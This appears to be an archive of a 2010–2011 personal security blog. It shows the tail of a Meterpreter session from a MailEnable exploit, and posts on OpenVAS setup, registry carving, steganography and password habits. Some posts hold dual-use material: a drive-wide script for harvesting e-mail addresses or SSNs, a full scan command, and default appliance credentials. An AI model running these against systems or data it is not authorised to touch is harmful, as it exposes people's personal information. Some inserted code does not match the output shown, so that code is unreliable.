meterpreter > Success!
[-] Unknown command: Success!.
meterpreter > exit
[*] Shutting down Meterpreter...

[*] Meterpreter session 1 closed. Reason: User exit
msf exploit(mailenable_login) > exit
root@bperry-laptop:/home/bperry#



Whee! I have submitted the patch to the metasploit guys here, it should be in trunk shortly. If you would like to play with this, you may download the relevant binaries from MailEnable themselves. Just not 2.35! Har har har...

Tuesday, February 8, 2011

OpenVAS 4 has landed in UNSTABLE in OBS

Add this to your sources.list:

deb http://download.opensuse.org/repositories/security:/OpenVAS:/UNSTABLE:/v4/xUbuntu_10.10/ ./


Then you need to get the key and add it to apt:


wget http://download.opensuse.org/repositories/security:/OpenVAS:/UNSTABLE:/v4/xUbuntu_10.10/Release.key
apt-key add Release.key
rm Release.key


Then just
apt-get update

Wednesday, January 5, 2011

Analyzing the Windows NT registry without advapi32.dll using Mono (PoC)

I have been doing some challenges for a contest and one requires analyzing a set of Windows NT registry hives. Regedit really sucks (though it does run in wine). I decided it would be more fun to write a small library that can read the registry hives without relying on p/invoke and advapi32.dll on Windows. I have some small code that carves out the data I need, though I am running into a problem on the software hive supplied. Maybe someone can point me in the right direction.

A lot of my information came from this text file which I found, and have updated some with information that I found missing.

As far as I can tell, there are six data types to be carved out of the hives: the regf file header, hbin blocks, node keys (nk), value keys (vk), lf/lh subkey-list blocks (lh on XP), and security keys (sk records) referenced from node keys. The following regexes should carve the data out of the registry files so you can parse out the information you need.


using System.Text.RegularExpressions;

// Hives are binary, so every pattern needs RegexOptions.Singleline: without it '.' does not
// match a 0x0A byte, and any record that happens to contain one is silently skipped.
// Inside [...] a '|' is a literal character, not alternation, so the classes list the bytes directly.
Regex regf = new Regex (@"^regf.{508}", RegexOptions.Singleline);                    // base block: signature plus the first 512 bytes
Regex nk   = new Regex (@"nk[\x2c\x20]\x00.{7}\x01.{64}", RegexOptions.Singleline);   // key node: flags, FILETIME, fixed fields; the name follows
Regex vk   = new Regex (@"vk.{3}\x00\x00[\x00\x80].{64}", RegexOptions.Singleline);   // value key: name length, data length (bit 31 set = data stored inline)
Regex hbin = new Regex (@"hbin.{4}\x00\x10\x00\x00.{8}", RegexOptions.Singleline);    // bin header; only matches bins of exactly 0x1000 bytes
Regex lf   = new Regex (@".{4}l[fh].{2}.{8}", RegexOptions.Singleline);              // lf (lh on XP) subkey list: cell size, signature, 2-byte element count
                                                                                      // ([0-65535] was a one-character class for '0'..'6', not a 2-byte count)


But in order to search the hive, we need to read it in. This isn't very efficient, and I am aware of this. It works.


using System;
using System.IO;
using System.Text.RegularExpressions;

using (FileStream fs = File.OpenRead (path)) {
    var data = new byte[checked((int)fs.Length)];
    int i = 0;
    int read;

    using (var ms = new MemoryStream (checked((int)fs.Length))) {

        // Copy 1 (data) and copy 2 (ms): pull the whole file into memory
        while ((read = fs.Read (data, 0, data.Length)) > 0) {
            ms.Write (data, 0, read);
            i += read;
        }

        byte[] hive = ms.ToArray ();          // copy 3
        char[] cList = new char[fs.Length];   // copy 4: one char per byte, so the \x.. escapes in the regexes match raw bytes

        i = 0;
        foreach (byte b in hive)
            cList[i++] = (char)b;

        string d = new string (cList);

        int all = 0;

        foreach (Match mx in lf.Matches (d)) { // swap in whichever regex you want here
            byte[] bb = new byte[mx.Value.Length];
            char[] cb = new char[mx.Value.Length];

            // Back to bytes for parsing; cb is only there to dump the match to the console
            for (int k = 0; k < mx.Value.Length; k++) {
                bb[k] = (byte)mx.Value[k];
                cb[k] = (char)bb[k];
            }

            all++;

            //Console.WriteLine (new string (cb));
        }

        Console.WriteLine (all.ToString ());
        all = 0;
    }
}


Basically, we read in the hive into a MemoryStream, convert the stream into a byte array, move that into a char array from which we create a string to search for the regexs in. Yes, we store 4 copies of the registry in memory. I am sure there are better ways to do this.

Then we loop through each match and count them. Of course we are working with binary streams, so if you choose to write the data carved out to the console, it will look like random data (to the untrained eye at least).

Running through all the hives supplied, I get this output:



/home/bperry/SAM
nk[\x2c|\x20]\x00.{7}\x01.{64}
47
.{4}l[f|h][0-65535].{8}
0
vk.{3}\x00\x00[\x00|\x80].{64}
36
hbin.{4}\x00\x10\x00\x00.{8}
6
^regf.{508}
1

/home/bperry/software
nk[\x2c|\x20]\x00.{7}\x01.{64}
43147
.{4}l[f|h][0-65535].{8}
6
vk.{3}\x00\x00[\x00|\x80].{64}
54708
hbin.{4}\x00\x10\x00\x00.{8}
2917
^regf.{508}
0

/home/bperry/system
nk[\x2c|\x20]\x00.{7}\x01.{64}
11189
.{4}l[f|h][0-65535].{8}
4
vk.{3}\x00\x00[\x00|\x80].{64}
21926
hbin.{4}\x00\x10\x00\x00.{8}
1121
^regf.{508}
1

/home/bperry/default
nk[\x2c|\x20]\x00.{7}\x01.{64}
554
.{4}l[f|h][0-65535].{8}
0
vk.{3}\x00\x00[\x00|\x80].{64}
1014
hbin.{4}\x00\x10\x00\x00.{8}
58
^regf.{508}
1

/home/bperry/SECURITY
nk[\x2c|\x20]\x00.{7}\x01.{64}
220
.{4}l[f|h][0-65535].{8}
0
vk.{3}\x00\x00[\x00|\x80].{64}
147
hbin.{4}\x00\x10\x00\x00.{8}
10
^regf.{508}
1



The number printed after the regex is the number of matches found. The data is fully carved out, so the only thing left is to break it apart to get the relevant data. If you will notice however, software reports 0 regf file headers, and I cannot figure out why. Any thoughts?
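The same carving approach, as an added example in Python rather than the post's C#, run over a constructed hive-like blob (not real registry data). It also shows one thing worth checking for the 0-count: in both .NET and Python, `.` does not match the newline byte 0x0A unless RegexOptions.Singleline / re.DOTALL is set, and a single 0x0A anywhere in the first 512 bytes is enough to make `^regf.{508}` fail.

```python
import re

# The post's cell signatures as byte regexes. Inside [...] a '|' is a literal
# character, so the post's [\x2c|\x20] also matches '|'; it is dropped here.
# The post's lf/lh pattern is left out: [0-65535] is the character class
# 0-6, 5, 3 and 5, not a numeric range.
PATTERNS = {
    "regf": rb"^regf.{508}",
    "hbin": rb"hbin.{4}\x00\x10\x00\x00.{8}",
    "nk": rb"nk[\x2c\x20]\x00.{7}\x01.{64}",
    "vk": rb"vk.{3}\x00\x00[\x00\x80].{64}",
}


def carve(hive, dotall=True):
    """Count matches of each signature over the raw hive bytes.

    dotall=True is the equivalent of RegexOptions.Singleline: without it '.'
    refuses to match 0x0A, so any signature that spans a newline byte is missed.
    """
    flags = re.DOTALL if dotall else 0
    return {name: sum(1 for _ in re.finditer(pat, hive, flags))
            for name, pat in PATTERNS.items()}


def build_sample_hive():
    """Constructed stand-in for a hive, not real registry data.

    A 512-byte base block with one 0x0A byte in its padding, then one hbin
    header, one nk cell and one vk cell shaped to the signatures above.
    """
    header = b"regf" + b"\x00" * 100 + b"\x0a" + b"\x00" * 407  # 512 bytes
    hbin = b"hbin" + b"\x00" * 4 + b"\x00\x10\x00\x00" + b"\x00" * 8
    nk = b"nk\x20\x00" + b"\x00" * 7 + b"\x01" + b"A" * 64
    vk = b"vk" + b"\x00" * 3 + b"\x00\x00\x80" + b"B" * 64
    return header + hbin + nk + vk


if __name__ == "__main__":
    hive = build_sample_hive()
    print("Singleline/DOTALL on: ", carve(hive))
    print("Singleline/DOTALL off:", carve(hive, dotall=False))
```

With DOTALL off the regf count drops to 0 while the other three signatures, which happen not to span the 0x0A byte, still count 1 each.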

Wednesday, November 24, 2010

New appliances for network auto-assessment script available

I have uploaded the beta od-autoassess 10.10 virtual appliances (VirtualBox) and have made them available through torrents (preferred) as well. I am getting close to capping my monthly bandwidth (450gb a month, dang!), so please use one of the torrents if possible. Please test them and report any issues by contacting me (or let me know how awesome it is!).

These appliances are fully configured to run all aspects of the autoassessment script. These are beta releases, though I don't think much will change between these betas and any official release. Credentials are rooty/ytoor and you can `sudo su` from there to get root and run a scan (a proper scan should be in the bash history on each appliance, getting root and running through the history should bring it up). But if you are lazy, here is a full scan command:


sh /opt/od-autoassess/od-autoassess.sh --client="FooBarWidgets" --range=192.168.1.0/24 --start-openvassd \
--openvas-user="rooty" --openvas-pass="ytoor" \
--metasploit-sql-driver="mysql" --metasploit-sql-conn="root:toor@127.0.0.1/metasploit" \
--enable-wapiti --enable-w3af


Also, if you like the appliances, the script, or any of my other projects, maybe a donation is in order! I am working part time at Joe's Crab Shack to pay my server and tuition costs while attending school, and any help will be much appreciated!

Tuesday, November 16, 2010

Maths, pt1 and other news

I recently found a really awesome project, MOSA (Managed Operating System Alliance). I haven't had more fun hacking and breaking code in a long time. It's just really neat being able to write your operating system in C#.

One of my projects is building an operating system that performs floating-point arithmetic and fast fourier transforms as kind of a benchmark for the operating system/Ahead-Of-Time compiler. A few years ago, I ported John Walker's FBENCH to C# and I thought this would be an excellent candidate for the task. He also has a benchmark, FFBENCH (Fast-Fourier Transforms) which I plan on porting in the next few days as well.

The MOSA project, however, is quite young compared to other projects like it. It isn't very complete at all and isn't really useful yet. I plan on helping out with this a bit. For instance, I took the trig functions John Walker uses in FBENCH (he defined all the trig functions in case you didn't want to use math.h) and moved them over to C#. It wasn't terribly difficult, just a bit tedious. If you would like a copy of these methods, you may get them here. If all goes well and according to plan, these methods will go into Korlib, the core library MOSA uses for the OS.

I will be making a post in the next few days regarding the ports of the two math benchmarks to C#, and maybe even an image of my OS that can run in QEMU! A new release had been made of the benchmarks since I ported last, so this morning was spent porting the new FBENCH to C# and it is working quite dandily (is that a word?). FFBENCH should be even easier. There are a few tests I want to run regarding these benchmarks. Speed of Mono vs .NET arithmetically and the speed of using System.Math vs my methods. Hopefully I have some good results to show soon.


Also, in other news, the OpenVAS Build Repo has added a 10.10 repository for Ubuntu. I have been testing it on my network here with virtual machines strewn about the house and everything seems dandy! I highly recommend you check it out if you are interested. As soon as I get a bit more free time, I will be releasing two virtual appliances updated to run the od-autoassess script (x86 and x86_64) on Maverick with all the new features I have implemented in the script.

Adding the repository is easy, and you can follow my guide here (updated yesterday) to get a new VM up and running. If you find any problems, let me know!

Sunday, November 7, 2010

New OpenDiagnostics Live CD Release

Updated ClamAV, Metasploit, od-autoassess script, and did an apt-get upgrade.

Installed netrw, really neat/easy utility for transferring files between computers without dealing with S/FTP. Similar to netcat.

Updated List Of Notable Apps.

Also removed all the fluxbox styles but the default Debian style. Current ISO size is 421 MB.

You can get the latest ISO here. Torrent will be available when I get around to making one (sometime today as well). This may hit the planets before being fully uploaded to my server, so if no release is there, just wait a bit.

Saturday, November 6, 2010

Compiling wireplay on x86_64 machines

I found a really neat tool for software fuzzing and general debugging called wireplay a few days ago. I finally got around to trying it out today, but found out pretty quickly it doesn't work right out of the box! A few bugs kept me from compiling wireplay cleanly on my machine, so I am posting them here (after emailing the author of course) so others can maybe get it working as well.

Bug #1: The makefile will only work for x86 machines. You can fix this
by using this as your RUBYINC line in the makefile

RUBYINC := /usr/lib/ruby/1.8/$(shell uname -m)-linux

The current version hardcodes i486, which will not work on all machines. This way it is more dynamic.


Bug #2: libnids1.23 does not compile due to missing expression in
#elif in killtcp.c. You can fix it with the following

On line 121, change
#elif

to

#elif LIBNET_VER != 0

Thursday, October 28, 2010

Finding sensitive information from a drive or folder

A quick script for finding email addresses on a massive scale (for instance, on a drive).


#!/usr/bin/env sh

SEARCHPATH="$1"

# Walk every regular file under the search path, one path per line.
find "$SEARCHPATH" -type f -print | while IFS= read -r file
do
	printf '\nSearching through %s...\n' "$file"

	# Pull printable strings out of the file (binary or not) and keep the lines
	# that look like an e-mail address. Swap the pattern for SSNs or whatever
	# else you are hunting for.
	MATCHES=$(strings "$file" | egrep '[[:alnum:]_.-]{1,64}@[[:alnum:]_.-]{2,255}\.[[:alpha:].]{2,4}')

	if [ "$MATCHES" != "" ]
	then
		printf '%s\n%s\n' '---------------------------' 'Found matches, beware false positives:'
		printf '%s\n' "$MATCHES"
	fi
done


False positives are pretty much guaranteed (as long as binary files are on the file system). Most sensitive data follows patterns, so the regex is interchangeable with one for SSNs or anything else you need to find.

Some example output from running the script on /usr/src/...


Searching through /usr/src/linux-headers-2.6.35-22/include/xen/interface/sched.h...
---------------------------
Found matches, beware false positives:
* Copyright (c) 2005, Keir Fraser <keir@xensource.com>

Searching through /usr/src/linux-headers-2.6.35-22/include/xen/interface/version.h...
---------------------------
Found matches, beware false positives:
* Copyright (c) 2005, Nguyen Anh Quynh <aquynh@gmail.com>
* Copyright (c) 2005, Keir Fraser <keir@xensource.com>

Searching through /usr/src/linux-headers-2.6.35-22/include/xen/interface/physdev.h...

Searching through /usr/src/linux-headers-2.6.35-22/include/xen/interface/event_channel.h...

Searching through /usr/src/linux-headers-2.6.35-22/include/xen/interface/vcpu.h...
---------------------------
Found matches, beware false positives:
* Copyright (c) 2005, Keir Fraser <keir@xensource.com>

Searching through /usr/src/linux-headers-2.6.35-22/include/xen/interface/memory.h...
---------------------------
Found matches, beware false positives:
* Copyright (c) 2005, Keir Fraser <keir@xensource.com>

Searching through /usr/src/linux-headers-2.6.35-22/include/xen/interface/elfnote.h...

Searching through /usr/src/linux-headers-2.6.35-22/include/crypto/skcipher.h...
---------------------------
Found matches, beware false positives:
* Copyright (c) 2007 Herbert Xu <herbert@gondor.apana.org.au>

Searching through /usr/src/linux-headers-2.6.35-22/include/crypto/ctr.h...
---------------------------
Found matches, beware false positives:
* Copyright (c) 2007 Herbert Xu <herbert@gondor.apana.org.au>

Searching through /usr/src/linux-headers-2.6.35-22/include/crypto/compress.h...

Searching through /usr/src/linux-headers-2.6.35-22/include/crypto/algapi.h...
---------------------------
Found matches, beware false positives:
* Copyright (c) 2006 Herbert <herbert@gondor.apana.org.au>

Searching through /usr/src/linux-headers-2.6.35-22/include/crypto/hash.h...
---------------------------
Found matches, beware false positives:
* Copyright (c) 2008 Herbert Xu <herbert@gondor.apana.org.au>

Sunday, October 24, 2010

Sloped Steganography

I have been preparing for my MAT exams so that I can skip all the basic math classes and just start off my college math at Calculus, playing with graphs and such. I started thinking of ways that I could use this for a project I am working on, a small steganography kit.

Say you have a binary file that is 20 bytes long and you want to embed the message "Helloworld" (10 bytes, one byte per character) into it, in a way that is not obvious to anyone but the person the message is intended for. We will divide both file sizes by 5 in this example to get the size of our grid... The grid can be any size that you can write an equation around.


[M][Z][0][0][0]
[0][0][0][0][0]
[0][0][0][0][0] + [H][e][l][l][o]
[0][0][0][0][0] + [w][o][r][l][d]


We don't care about the binary file, it is the message that is important. If it just seems 'corrupted' by anyone else all the better.

Most of us will probably remember rise over run from elementary school. Treating each row in the message separately, we can insert the message using a slope evenly and easily into the binary file (using 1/1 and -1/1 for "world" and "Hello", respectively). With some trig thrown in, you can get some nice graph-like steganography:


[H][Z][0][0][o]
  \        /
[0][e][r][l][0]
     /\ /\
[0][o][l][l][0]
  /        \
[w][0][0][0][d]


Pardon the rough mockup. Hopefully it is easy to follow.

For the technicals, we assume that [w] is located at (0,0). Both y and x = 0. That gives us a y-max of 4 and an x-max of 5. Our 'Hello' row has its trough at (3,1) and its peak at both (0,4) and (5,4). Our 'world' row has its peak at (3,3) and its troughs at (0,0) and (0,5) . From this, we can derive an equation for each line and can piece together the message.

Of course, as the message/data to be hidden grows, the math can become more and more complicated, but the amount of stealthiness is limited only by your imagination.
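The embedding and extraction from the mockup above, as an added example that is not part of the original post. It follows the grid as drawn ([w] at (0,0), 5 columns by 4 rows over a constructed 20-byte cover), with each message row written along its own V-shaped path of slopes -1 and +1; the path functions are the shared secret, and the helper names are mine.

```python
"""Slope steganography along the V-shaped paths of the grid mockup above."""

def _index(x, y, width, height):
    # (0, 0) is the bottom-left cell, where [w] sits in the post; the cover
    # bytes are stored row-major from the top row of the grid downwards.
    return (height - 1 - y) * width + x

def embed_row(cover, width, height, message, path):
    """Write message[x] into the cell (x, path(x)) for each column x."""
    if width * height != len(cover):
        raise ValueError("grid does not cover the file exactly")
    buf = bytearray(cover)
    for x, ch in enumerate(message):
        y = path(x)
        if not (0 <= x < width and 0 <= y < height):
            raise ValueError(f"path leaves the grid at ({x}, {y})")
        buf[_index(x, y, width, height)] = ord(ch)
    return bytes(buf)

def extract_row(stego, width, height, length, path):
    """Read the cells back along the same path; the path is the shared secret."""
    return "".join(chr(stego[_index(x, path(x), width, height)])
                   for x in range(length))

def hello_path(x):
    # 'Hello' falls with slope -1 from (0, 3) to the trough (2, 1), then rises.
    return abs(x - 2) + 1

def world_path(x):
    # 'world' is the mirror image: up from (0, 0) to the peak (2, 2), then down.
    return 2 - abs(x - 2)

def demo():
    width, height = 5, 4
    cover = bytes(20)  # constructed 20-byte "binary file", all zeros
    stego = embed_row(cover, width, height, "Hello", hello_path)
    stego = embed_row(stego, width, height, "world", world_path)
    recovered = (extract_row(stego, width, height, 5, hello_path)
                 + extract_row(stego, width, height, 5, world_path))
    return stego, recovered

if __name__ == "__main__":
    stego, recovered = demo()
    for r in range(4):
        print(" ".join("[%s]" % (chr(b) if b else "0") for b in stego[r * 5:(r + 1) * 5]))
    print(recovered)
```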

Friday, July 30, 2010

OD AutoAssess Network Script

A few days ago, I posted a small bit on automating OpenVAS. I have written a small shell script that I use to automate (almost) full network testing and assessment. The reason I say almost is because you still need to go through the data collected to make sure nothing serious is up.

This script requires htmldoc, metasploit, openvas-client and -scanner, nmap, and zip. I have posted it to my random script and snippets page and will maintain it there, but posting here as well.

May not be perfect, my bash-fu is rusty. Some extra info, htmldoc is quite neat. You can actually specify a logo image to use if you want for your company adding '--header l --logoimage /path/to/logo.jpg'.

UPDATE: Updated code w/ svn repo here.

Thursday, May 27, 2010

On passwords (or passphrases)

I read this article trying to justify having a password file storing all of the rest of your sensitive information. I think the author is completely wrong.

I have a system of password templates for specific tasks being done by the password. If the password is being used to complete an administrative task, I have a template (I actually call it a passphrase). For general tasks requiring a password, I have a specific password template.

For instance, l3t_m3_1n_$sitename (template isn't real, just for showing purposes) would be a fairly legitimate passphrase, replacing $sitename with a word that describes the website at hand (maybe the site name, maybe the site topic). If you subscribed to the wall street journal's website, your passphrase may be l3t_m3_1n_wsj. If you were an admin for wall street journal, you may use the template l3t_m3_adm1n_wsj.

With this system, your password will be different for each website you use, thoroughly complex enough to keep the passphrase from being cracked, and the templates themselves don't change, so what you remember is far less than what the password itself is.

The only nuance I have found is that not all websites allow the same characters in passwords, which does get annoying.

Monday, April 26, 2010

How much can I learn about you while you browse CNN?

Generally, I get my news from three sources: BBC, CNN, and Digg (oh well, not all news :-P). Today, I had a very nasty surprise when I went to CNN.

A list of my friends' facebook statuses and "groups" people had liked related to the content on the CNN homepage. Every time I refreshed the page, the groups and statuses changed. This disturbs me for two reasons that I hope don't sound absolutely crazy.

The first reason: If a person is listening over your network with something like wireshark, he now has a list of people you know after just a few page clicks. He can look these people up on facebook and get a lot of information on you just with that. Maybe a mandatory HTTPS:// on any site consuming the facebook api in that way is the way to go?

The second reason: Does this adhere to the privacy settings I set? Or does this adhere to the friends who can see me when logged in? If my statuses are being sent onto a web site like that, that would make me incredibly uncomfortable.

I have gone to great lengths to make sure what I put on facebook stays on facebook. These gadgets are poking up everywhere, and simple javascript exploits could gather this data, let alone trojans, activex controls, or rogue BHO's.

Am I just being too paranoid?

And just FYI: If you ever need any info on people, it's scary how much info you can get from facebook not even being their friend.


EDIT: Ok, I did some research using wireshark. I was successfully able to capture my Facebook integer ID that they used before we all had 'usernames' and find myself. Not only that, but it was my whole facebook cookie.

Sunday, April 11, 2010

Stupid IE password box behavior

If you have special characters in your password like most good passwords should, and you type your password (with special chars) into a textbox in password mode and use ctrl+bkspc to clear the password, it will give you the location of the special chars in the password box.

I consider this a gigantic security flaw, and it is pretty terrible. I have only found this behavior in IE. Is this known? I seem to remember running into this for years.


EDIT:

For example, try this:

Go to gmail in IE.

Focus on the password box, type "password" (no quotes), and then hit ctrl+bkspc.

Then do the same for "pass/word" (no quotes).